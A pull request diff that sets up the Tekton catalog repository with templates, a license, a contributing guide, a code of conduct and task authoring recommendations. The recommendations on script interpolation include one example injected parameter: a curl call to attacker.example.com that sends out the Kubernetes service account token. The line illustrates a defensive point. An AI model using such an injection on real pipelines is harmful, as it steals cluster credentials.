### PR TITLE
Add initial template

### DIFF
--- a/.github/ISSUE_TEMPLATE/bug_report.md
+++ b/.github/ISSUE_TEMPLATE/bug_report.md
@@ -1,0 +1,30 @@
+# Expected Behavior
+
+# Actual Behavior
+
+# Steps to Reproduce the Problem
+
+1.
+2.
+3.
+
+# Additional Info
+
+- Kubernetes version:
+
+  **Output of `kubectl version`:**
+
+```
+(paste your output here)
+```
+
+- Tekton Pipeline version:
+
+  **Output of `tkn version` or `kubectl get pods -n tekton-pipelines -l app=tekton-pipelines-controller -o=jsonpath='{.items[0].metadata.labels.version}'`**
+
+```
+(paste your output here)
+```
+
+
+<!-- Any other additional information -->

--- a/.github/ISSUE_TEMPLATE/feature_request.md
+++ b/.github/ISSUE_TEMPLATE/feature_request.md
@@ -1,0 +1,7 @@
+### Feature request
+
+<!-- Please describe the feature request and why you would like to have it -->
+
+### Use case
+
+<!-- Please add a concrete use case to demonstrate how such a feature would add value for the user. If you don't have a use case for your feature, please remove this section (however providing a good use case increases the likelihood to be picked up) -->

--- a/.github/LICENSE
+++ b/.github/LICENSE
@@ -1,0 +1,201 @@
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   APPENDIX: How to apply the Apache License to your work.
+
+      To apply the Apache License to your work, attach the following
+      boilerplate notice, with the fields enclosed by brackets "[]"
+      replaced with your own identifying information. (Don't include
+      the brackets!)  The text should be enclosed in the appropriate
+      comment syntax for the file format. We also recommend that a
+      file or class name and description of purpose be included on the
+      same "printed page" as the copyright notice for easier
+      identification within third-party archives.
+
+   Copyright [yyyy] [name of copyright owner]
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.

--- a/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md
+++ b/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md
@@ -1,0 +1,48 @@
+<!-- 🎉🎉🎉 Thank you for the PR!!! 🎉🎉🎉 -->
+
+# Changes
+
+<!-- Describe your changes here- ideally you can get that description straight from
+your descriptive commit message(s)! -->
+
+# Submitter Checklist
+
+These are the criteria that every PR should meet, please check them off as you
+review them:
+
+- [ ] Follows the [authoring recommendations][authoring]
+- [ ] Includes [docs][docs] (if user facing)
+- [ ] Includes [tests][tests] (for new tasks or changed functionality)
+  - See the [end-to-end testing documentation][e2e] for guidance and CI details.
+- [ ] Meets the [Tekton contributor standards][contributor] (including functionality, content, code)
+- [ ] Commit messages follow [commit message best practices][commit]
+- [ ] Has a kind label. You can add one by adding a comment on this PR that
+  contains `/kind <type>`. Valid types are bug, cleanup, design, documentation,
+  feature, flake, misc, question, tep
+- [ ] Complies with [Catalog Organization TEP][TEP], see [example]. **Note** [An issue has been filed to automate this validation][validation]
+  - [ ] File path follows  `<kind>/<name>/<version>/name.yaml`
+  - [ ] Has `README.md` at `<kind>/<name>/<version>/README.md`
+  - [ ] Has mandatory `metadata.labels` - `app.kubernetes.io/version` the same as the `<version>` of the resource
+  - [ ] Has mandatory `metadata.annotations` `tekton.dev/pipelines.minVersion`
+  - [ ] mandatory `spec.description` follows the convention
+
+          ```
+
+          spec:
+            description: >-
+              one line summary of the resource
+
+              Paragraph(s) to describe the resource.
+          ```
+
+_See [the contribution guide](https://github.com/tektoncd/catalog/blob/master/CONTRIBUTING.md) for more details._
+
+[TEP]: https://github.com/tektoncd/community/blob/master/teps/0003-tekton-catalog-organization.md
+[example]: https://github.com/tektoncd/catalog/tree/master/task/git-clone/0.1
+[validation]: https://github.com/tektoncd/catalog/issues/413
+[authoring]: https://github.com/tektoncd/catalog/blob/main/recommendations.md
+[docs]: https://github.com/tektoncd/community/blob/master/standards.md#docs
+[tests]: https://github.com/tektoncd/community/blob/master/standards.md#tests
+[e2e]: https://github.com/tektoncd/catalog/blob/main/CONTRIBUTING.md#end-to-end-testing
+[contributor]: https://github.com/tektoncd/community/blob/main/standards.md
+[commit]: https://github.com/tektoncd/community/blob/master/standards.md#commit-messages

--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -1,0 +1,272 @@
+# Contributing to the catalog repo
+
+Thank you for your interest in contributing!
+
+This doc is about how to contribute to this repo specifically. For how to
+contribute to tektoncd projects in general, see [the overview in our README](README.md)
+and the individual `CONTRIBUTING.md` files in each respective project.
+
+**All contributors must comply with
+[the code of conduct](./code-of-conduct.md).**
+
+PRs are welcome, and will follow
+[the tektoncd pull request process](https://github.com/tektoncd/community/blob/main/process.md#pull-request-process).
+
+## How to Contribute a Task or Pipeline
+
+The Catalog repository is intended to serve as a location where users can find
+`Task`s and `Pipeline`s that are maintained, useful and follow established
+best practices.
+
+The process for contributing looks like this:
+
+1. Fork this repository, develop and test your `Task`s.
+2. Create a new folder for your `Task`(s)
+3. Ensure your Task
+   1. Follows the [guidelines](#guidelines)
+   2. Meets the [technical requirements](#technical-requirements)
+   3. Includes [OWNERS](#owning-and-maintaining-a-task)
+4. Submit a pull request.
+
+## How to Contribute a new version of a Task or Pipeline
+
+If you are planning to add a new version of a Task or Pipeline make sure to
+separate your changes from the copied task. This makes it easy for reviewers to
+review the changes and not the actual copy.
+
+For example if you have to bump the catalog task called `foo` from `0.1` to
+`0.2` you simply first copy the old task :
+
+```shell
+% cp -a tasks/foo/0.1 tasks/foo/0.2
+```
+
+and then immediately commit that change :
+
+```shell
+% git add tasks/foo/0.2
+% git commit -m "Copy task foo from 0.1 to 0.2
+```
+
+and then add your change and commit it.
+
+This will result to a clean git log and makes it easier to only see your
+changes.
+
+### Guidelines
+
+When reviewing PRs that add new `Task`s or `Pipeline`s, maintainers will follow
+the following guidelines:
+
+* Submissions should be useful in real-world applications.
+While this repository is meant to be educational, its primary goal is to serve
+as a place users can find, share and discover useful components.
+This is **not** a samples repo to showcase Tekton features, this is a collection
+* Submissions should follow established [authoring recommendations](recommendations.md)
+* Submissions should be well-documented.
+* *Coming Soon* Submissions should be testable, and come with the required
+tests.
+
+If you have an idea for a new submission, feel free to open an issue to discuss
+the idea with the catalog maintainers and community.
+Once you are ready to write your submission, please open a PR with the code,
+documentation and tests and a maintainer will review it.
+
+Over time we hope to create a scalable ownership system where community members
+can be responsible for maintaining their own submissions, but we are not there
+yet.
+
+
+### Technical requirements
+
+* Must pass the Task validation (aka `kubectl create -f task.yaml`
+  should succeed)
+* Images should be published and maintained on an public image
+  registry (gcr.io, docker.io, quay.io, …). A bonus if those images are
+  auto-built.
+* Images should not have any major security vulnerabilities
+* Should follow Kubernetes best practices
+* Provide as many default paramater values as possible
+* Provide [end to end tests](#end-to-end-testing)
+* (Nice to have) : provide versions with and without `PipelineResource`
+
+#### End to end Testing
+
+There are two types of e2e tests launched on CI.
+
+The first one would just apply the yaml files making sure they don't have any
+syntax issues. Pretty simple one, it just basically checks the syntax.
+
+The second one would do some proper functional testing, making sure the task
+actually **ran** properly.
+
+The way the functional tests works is that if you have a directory called
+`tests/` inside the task, CI will create a random `Namespace` then apply
+the task and then every yaml file in the `tests/` directory.
+
+Note that the test runner for the integration tests will only test the tasks
+that have been added or modified in the submitted PR and will not run tests for
+any tasks that haven't been changed unless the environment variable
+`TEST_RUN_ALL_TESTS` has been set.
+
+Usually in these other yaml files you would have a yaml file for the
+test resources (`PipelineResource`) and a yaml files to run the tasks
+(`TaskRun or PipelineRun`).
+
+Sometimes you may need to be able to run scripts before applying the tested task
+or the other yaml files. For example, your tests may need pre-setup in the
+`Namespace`, external setup, or perhaps even manipulation of the main `Task`.
+
+For example on *image builders* tasks like `kaniko` or `jib` we want to upload
+the tasks to a registry to make sure it is actually built properly. To do so, we
+[manipulate](task/kaniko/0.6/tests/pre-apply-task-hook.sh) the `Task` with a
+python script (something we only want for the tests) to add a registry as a
+`Sidecar` and make sure that the `TaskRun` sets the parameters to upload there.
+This is simple and straightforward -- there is no need to upload to an external
+image registry provider which would require settin up tokens and dealing with
+both side effects and an external dependency.
+
+There are two different scripts that are automatically applied if present. These
+are applied using the `source` bash script, so you can output environment
+variables that will be applied:
+
+1. **pre-apply-task-hook.sh**: Script to run before applying the task
+2. **pre-apply-taskrun-hook.sh**: Script to run before applying the taskruns or other yaml files.
+
+We have some helper functions you can use from your `hook` scripts:
+
+* **add_sidecar_registry**: This will add a registry as a sidecar to allow the
+  builder tasks to upload an image directly to this sidecar registry instead of
+  relying on an external registries.
+* **add_sidecar_secure_registry**: This will run a secure registry as a sidecar
+  to allow the tasks to push to this registry using certs. It will create a
+  configmap `sslcert` with certificate available at key `ca.crt`
+* **add_task**: Install a task into the testing namespace, the first argument is
+  the name of the task, the second argument is the version of the task. If the
+  version is equal to `latest` it will install the latest version of the task.
+
+What can you run from those scripts is defined in the test-runner image. If you
+need to have another binary available, make a PR to this `Dockerfile`:
+
+https://github.com/tektoncd/plumbing/blob/main/tekton/images/test-runner/Dockerfile
+
+A helper script called [`run-test.sh`](test/run-test.sh) is provider in the
+[test](./test) directory to help the developer running the test locally. Just
+specify the task name and the version as the first and the second argument i.e:
+
+```bash
+./test/run-test.sh git-clone 0.1
+```
+
+and it will use your current kubernetes context to run the test and show you the
+outputs similar to the CI.
+
+#### End to end Testing for external services
+
+Some tasks need to be able to access some external REST api services.
+
+There are two approaches for testing external services:
+
+1. Spin up a deployment of the service tests and expose a kubernetes service.
+2. Create an http rest api reflector for task that connects to a rest apis
+   endpoint that cannot be available as a deployment (i.e: Saas services like
+   github)
+
+For the first approach, you can take the [trigger-jenkins-build
+test](task/trigger-jenkins-job/0.1/tests/) as an example.
+
+You will want to modify the
+[pre-apply-task-hook.sh](task/trigger-jenkins-job/0.1/tests/pre-apply-task-hook.sh)
+script to create the deployment and make it available to your test `PipelineRun`.
+
+Here is a rundown of the steps we are doing in `trigger-jenkins-build/pre-apply-task-hook.sh` script :
+
+- Create a deployment with the `jenkins` image
+- Wait until the deployment has completed.
+- Expose the deployment as a service, which would then be easily available for
+  other pods in the namespace.
+- Do some shenanigans inside the jenkins pod so we can grab the jenkins apikey
+  and create a new jenkins job.
+- Create a secret with the apikey, username and other items.
+
+The [test pipelinerun](task/trigger-jenkins-job/0.1/tests/run.yaml) for the
+`trigger-jenkins-build/` will then point to `http://jenkins:8080` which is the
+service URL where our just deployed jenkins is exposed. It uses the credentials
+from the secret in the `pre-apply-task-hook.sh` script.
+
+For services where you can't spin up a new deployment of the service easily, the
+test runner supports the ["Go Rest api
+test"](https://github.com/chmouel/go-rest-api-test) project.  The Go rest api
+test project is a simple service that replies back to http requests according to
+rules.
+
+As an example see the [github-add-comment task](task/github-add-comment).
+For this task to be tested we need to be able to *"fake"* the Github REST api
+calls. To be able to do so, we are adding a go-rest-api-test rule inside the
+[testing](task/github-add-comment/0.1/tests/fixtures) repository; the rule looks
+like this :
+
+```yaml
+---
+headers:
+  method: POST
+  path: /repos/{repo:[^/]+/[^/]+}/issues/{issue:[0-9]+}/comments
+response:
+  status: 200
+  output: '{"status": 200}'
+  content-type: text/json
+```
+
+The rule is saying that for every **POST** requests going to this url :
+
+`/repos/${ORG}/${REPO}/issues/${issues}/comments`
+
+we will reply by a `200` status and output `{"status": 200}`
+
+The [Pipelinerun](task/github-add-comment/0.1/tests/run.yaml) test for the
+`github-add-comment` task overrides the github host url in its param to point to
+`localhost:8080` :
+
+```yaml
+    - name: GITHUB_HOST_URL
+      value: http://localhost:8080
+```
+
+In the [test runner](test/e2e-common.sh) if we find a directory called
+`task/${task}/${version}/tests/fixtures` we automatically spin up the
+["go-rest-api-test"](https://github.com/chmouel/go-rest-api-test) server as a
+sidecar container with the test's fixtures yaml as the config. It will be then
+available to the task locally to this URL `http://localhost:8080`.
+
+The task runs against that service instead of the github servcer and the
+responder replies with the right calls, we know then that the task has been
+properly tested.
+
+The only requirement to use the fixtures testing facility is to enable the task
+to override the URL via a task parameter.
+
+The `go-rest-api-test` is a very simple service at the moment and may see other
+improvements in the future to support more robust testing.
+
+### Owning and Maintaining a Task
+
+Individual tasks should maintained by one or more users of
+GitHub. When someone maintains a Task, they have the access to merge
+changes to that Task. To have merge access to a Task, someone needs to:
+
+1. Be invited (and accept your invite) as a read-only collaborator on
+[the tekton organization](https://github.com/tektoncd). If you need
+sponsors and have contributed to the chart, please reach out to the
+existing maintainers, or if you are having trouble connecting with
+them, please reach out to one of the main [OWNERS](OWNERS) of this
+repository.
+2. an `OWNERS` file needs to be added in the `Task` folder. That
+`OWNERS` file should list the maintainers' GitHub login names for both
+the reviewers and approvers sections.
+
+## OWNERS
+
+The top-level [`OWNERS`](OWNERS) file lists the *Trusted
+Collaborators*. The process to [becoming an
+OWNER](https://github.com/tektoncd/community/blob/main/process.md#owners)
+is the same as other Tekton projects.

--- a/DEVELOPMENT.md
+++ b/DEVELOPMENT.md
@@ -1,0 +1,1 @@
+See [the contributing guide](CONTRIBUTING.md).

--- a/code-of-conduct.md
+++ b/code-of-conduct.md
@@ -1,0 +1,75 @@
+# Contributor Covenant Code of Conduct
+
+## Our Pledge
+
+In the interest of fostering an open and welcoming environment, we as
+contributors and maintainers pledge to making participation in our project and
+our community a harassment-free experience for everyone, regardless of age, body
+size, disability, ethnicity, gender identity and expression, level of
+experience, education, socio-economic status, nationality, personal appearance,
+race, religion, or sexual identity and orientation.
+
+## Our Standards
+
+Examples of behavior that contributes to creating a positive environment
+include:
+
+- Using welcoming and inclusive language
+- Being respectful of differing viewpoints and experiences
+- Gracefully accepting constructive criticism
+- Focusing on what is best for the community
+- Showing empathy towards other community members
+
+Examples of unacceptable behavior by participants include:
+
+- The use of sexualized language or imagery and unwelcome sexual attention or
+  advances
+- Trolling, insulting/derogatory comments, and personal or political attacks
+- Public or private harassment
+- Publishing others' private information, such as a physical or electronic
+  address, without explicit permission
+- Other conduct which could reasonably be considered inappropriate in a
+  professional setting
+
+## Our Responsibilities
+
+Project maintainers are responsible for clarifying the standards of acceptable
+behavior and are expected to take appropriate and fair corrective action in
+response to any instances of unacceptable behavior.
+
+Project maintainers have the right and responsibility to remove, edit, or reject
+comments, commits, code, wiki edits, issues, and other contributions that are
+not aligned to this Code of Conduct, or to ban temporarily or permanently any
+contributor for other behaviors that they deem inappropriate, threatening,
+offensive, or harmful.
+
+## Scope
+
+This Code of Conduct applies both within project spaces and in public spaces
+when an individual is representing the project or its community. Examples of
+representing a project or community include using an official project e-mail
+address, posting via an official social media account, or acting as an appointed
+representative at an online or offline event. Representation of a project may be
+further defined and clarified by project maintainers.
+
+## Enforcement
+
+Instances of abusive, harassing, or otherwise unacceptable behavior may be
+reported by contacting the project team at
+tekton-code-of-conduct@googlegroups.com. All complaints will be reviewed and
+investigated and will result in a response that is deemed necessary and
+appropriate to the circumstances. The project team is obligated to maintain
+confidentiality with regard to the reporter of an incident. Further details of
+specific enforcement policies may be posted separately.
+
+Project maintainers who do not follow or enforce the Code of Conduct in good
+faith may face temporary or permanent repercussions as determined by other
+members of the project's leadership.
+
+## Attribution
+
+This Code of Conduct is adapted from the [Contributor Covenant][homepage],
+version 1.4, available at
+https://www.contributor-covenant.org/version/1/4/code-of-conduct/
+
+[homepage]: https://www.contributor-covenant.org

--- a/profile/README.md
+++ b/profile/README.md
@@ -1,0 +1,5 @@
+<img src="https://raw.githubusercontent.com/cdfoundation/artwork/main/tekton/horizontal/color/tekton-horizontal-color.svg" alt="Tekton logo" width="300"/>
+
+Cloud Native CI/CD
+
+Learn more at https://tekton.dev/

--- a/recommendations.md
+++ b/recommendations.md
@@ -1,0 +1,307 @@
+# Task Authoring Recommendations
+
+This is a collection of recommendations for developers authoring Tasks, with
+justifications for why they are recommended.
+
+These are just _recommendations_, and there may be situations where the
+recommendation cannot or should not be followed.
+
+This is a living document. Recommendations may be added in the future, or
+existing recommendations may change or be clarified.
+
+If you have a question or would like to add a recommendation, please file an
+issue.
+
+## Reference Images by Digest
+
+Where possible, an image used in a step should be referenced by digest (i.e.,
+`busybox@sha256:abcde...`) instead of by tag (`busybox:latest`). This ties the
+Task to the exact specific version of the image, and prevents unexpected
+changes.
+
+Referencing by tag (`:latest` or `:v1.2.3`) means that an owner of that image
+can push a new image to that tag, and all Tasks that reference the image by
+that tag will start using it immediately. This can lead to unexpected Task
+failures, or silent behavior changes, including security-sensitive changes.
+
+## Run as non root and non privileged
+
+One of the security best practices of containers is to run them as a
+non-root user. Usually this is achieved by having a user defined in
+your image and having it referred in your image configuration. You can
+see
+[here](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/#user)
+for details on best practice with `Dockerfile`s.
+
+You should also avoid as much as possible to run containers as
+[privileged](https://stackoverflow.com/questions/36425230/privileged-containers-and-capabilities).
+
+> The --privileged flag gives all capabilities to the container, and
+> it also lifts all the limitations enforced by the device cgroup
+> controller. In other words, the container can then do almost
+> everything that the host can do. This flag exists to allow special
+> use-cases, like running Docker within Docker.
+
+On the catalog, this means that you should, where possible:
+- **ensure the image you are using can run as non-root** ; any step
+  that do not specify explicitly that it needs to be run as root
+  should work when running as a user.
+- if your step really need to be run as root, specify it in the task
+  using
+  [`securityContext`](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/),
+  same applies for `privileged`.
+
+  ```yaml
+  # […]
+    steps:
+    - name: foo
+      image: myimage
+      securityContext:
+        runAsUser: 0 # root uid == 0
+        privileged: true
+  ```
+
+## Be as portable and compatible as possible
+
+Make use of recent Kubernetes and Tekton features only when a user
+will expect it from the task's purpose. Your task may be of great use
+to users that have good reason not to upgrade right now. Your task
+should include the `tekton.dev/pipelines.minVersion`.
+
+## Remember that there are other languages than sh and bash
+
+Yes, sh and bash are DSLs for running processes, but sometimes there
+are other languages more suited for what you're trying to do.  Tekton
+Pipelines' main positive attribute is the ability to have the right
+tool available for every step, including the _interpreter_.
+Use python or another scripting languages when that is warranted.
+
+A python example:
+
+```
+  steps:
+    - name: foo
+      image: python:alpine
+      script: |
+        #!/bin/env python
+        import os
+        print(os.getenv('PARAM_ONE'))
+```
+
+## Don't use interpolation in scripts or string arguments
+
+Using `$(tekton.task)` interpolation in the `script` or as a `sh -c`
+string is extremely fragile.  The interpolation done by tekton is not
+aware of the context in which the interpolation happens.  A space, a
+quote sign, a backslash or newline could easily thwart an otherwise
+beautiful script.
+
+```
+  steps:
+  - name: foo
+    image: myimage
+    script: |
+      echo $(params.one)
+```
+
+If `params.one` happens to contain a quote, then the resulting shell
+script might look like this:
+
+```
+echo '
+```
+
+This script is not valid, and the task will fail:
+
+```
+sh: 1: Syntax error: Unterminated quoted string
+```
+
+This goes for standard shell scripts, python scripts or any other
+script where tekton ends up interpolating variables.  Different
+languages have different quoting rules in different contexts, but a
+maliciously formed parameter would be able to break out of any
+quoting.
+
+No amount of escaping will be air-tight.  Even python `"""` strings.
+A maliciously formed parameter just needs to include another `"""` to
+close the string:
+
+```
+    script: |
+      #!/bin/env python
+      value = """$(params.one)"""
+      print(value)
+```
+
+If the parameter has the value `"""` followed by a line break, then
+the anything after the parameter's newline will be interpreted as
+**python code**, probably causing the script to fail, or worse.
+
+Instead, use environment variables or arguments, which are not
+interpolated into the script source code:
+
+```
+  steps:
+  - name: foo
+    image: myimage
+    env:
+      - name: PARAM_ONE
+        value: $(params.one)
+    args:
+      - $(params.one)
+    script: |
+      echo "$PARAM_ONE"
+      echo "$1"
+```
+
+The script will now correctly print out the value of params.one,
+regardless of what it contains; both environment variables and
+arguments.
+
+It is worth mentioning that an interpolated script (i.e. one that has
+`$(params.values)` in it) is a security problem.  If an attacker is
+able to send in a parameter value that looks something like `$(curl -s
+http://attacker.example.com/?value=$(cat
+/var/run/secrets/kubernetes.io/serviceaccount/token))`, then the
+attacker would be able to exfiltrate the service account token for the
+TaskRun.
+
+## Extract task code (scripts) to their own files
+
+As a task grows in complexity, it becomes harder and harder to
+maintain it in-line.  Because you have already avoided interpolation
+in the script, there is no real need for the script to be in-lined
+into the Task.
+
+As with all configuration and code that you write as part of software
+development, it is important to treat the Tasks and embedded scripts
+with the same care you use for your other code.
+
+Scripts should be maintained such that they can be versioned and tested;
+therefore as a script grows beyond a few simple lines, you should store
+the script in version control, and use tests and code review to maintain
+it over time. At this point you may want to consider switching from a
+language which does not naturally support tasking, such as bash, to one
+that does, such as Python.
+
+At this point, the best option we have to offer is to build and publish
+an image which contains your tested, versioned script, and use that image
+from within your Task. This may seem like a big ask, but another way of
+looking at it is that your script has graduated from just being a script
+to being a tool.
+
+## Test and verify your task code
+
+Use sound engineering principles when building Tekton Task code.
+Since the code can reside in external files, it's possible to split
+them up and have test harnesses that test various code paths.  Have a
+build system that runs the task's test harness whenever you make
+changes to them before you commit, and of course a Tekton Pipeline to
+verify that your tests are passing before merging.
+
+## Create idempotent tasks and pipelines
+
+When you design tasks and pipelines, they should, as much as possible
+be written in an idempotent manner.  Idempotency means that it is safe
+to re-execute, and this can be used to your advantage.  If designed
+properly, it can also allow you to skip work that has already happened
+(see level-based approach).
+
+## Clearly define the format of input parameters and results
+
+Specify the format when defining parameters and results, even down to
+trailing whitespace.  Specify the intention behind them.  For
+parameters, indicate if there are other tasks that might have an output
+that matches.  For a result, indicate where you might use the result.
+
+This is especially important when building tasks that may be composed
+in different ways, and where the results of some tasks are intended to
+be the parameters to other tasks.
+
+## Use composable parameter formats
+
+Especially when passing lists of items between tasks (i.e. a list of
+items from one task, designed to be the parameter of another task),
+avoid using structured strings, tab-separated values, or even
+line-separated values.  Such formats are prone to error due to simple
+whitespace mistakes, or a rogue value that contains a hard-to-detect
+newline.
+
+Instead use a more structured data format like e.g. a json stream or
+more formally [JSON Text Sequences RFC
+7464](https://tools.ietf.org/html/rfc7464), and use jq to process the
+different _records_ that are passed in to a task.  This ensures you
+can pass almost any conceivable type of data without any escaping
+issues.
+
+```
+# task foo
+  steps:
+  - name: foo
+    image: myimage
+    script: |
+      echo '{"value": 123}' >> $(results.data.path)
+
+# task other
+  steps:
+  - name: bar
+    image: myimage
+    script: |
+      printf '{"size": "large"}' >> $(results.data.path)
+      printf '{"size": "small", "fake": true}' >> $(results.data.path)
+
+# pipeline
+  - name: example
+    taskRef:
+      kind: Task
+      name: pipeline
+    params:
+    - name: data
+      value: |
+        $(tasks.foo.results.data)
+        $(tasks.bar.results.data)
+```
+
+Here, the "foo" and "bar" task results and the "data" parameter of the
+pipeline have been defined to be _of type JSON Stream_, allowing the
+pipeline author to construct the pipeline parameter value directly by
+concatenating the results.  This construct does not fall apart when
+the data is on one line or split on multiple lines.
+
+## Use "level-based" approach to your advantage
+
+If you have a task that creates another pipelinerun in order to
+complete its work, you should leverage the fact that `kubectl apply`
+has "create-or-update" semantics.  If you _apply_ a pipelinerun that
+already exists, it means that you don't need to rerun the pipeline.
+
+For example, if you have a task that takes a commit as a parameter,
+say `abc123def`, and its job is to create a pipelinerun with that
+commit as a parameter (and the other pipeline is idempotent, and does
+not need to be re-run for the same commit), then you could _apply_ the
+pipelinerun `run-abc123def`.  The first time, `run-abc123def` won't
+exist, and a PipelineRun will be created, running the pipeline.  If,
+at a later point in time, the task happens to be run with the same
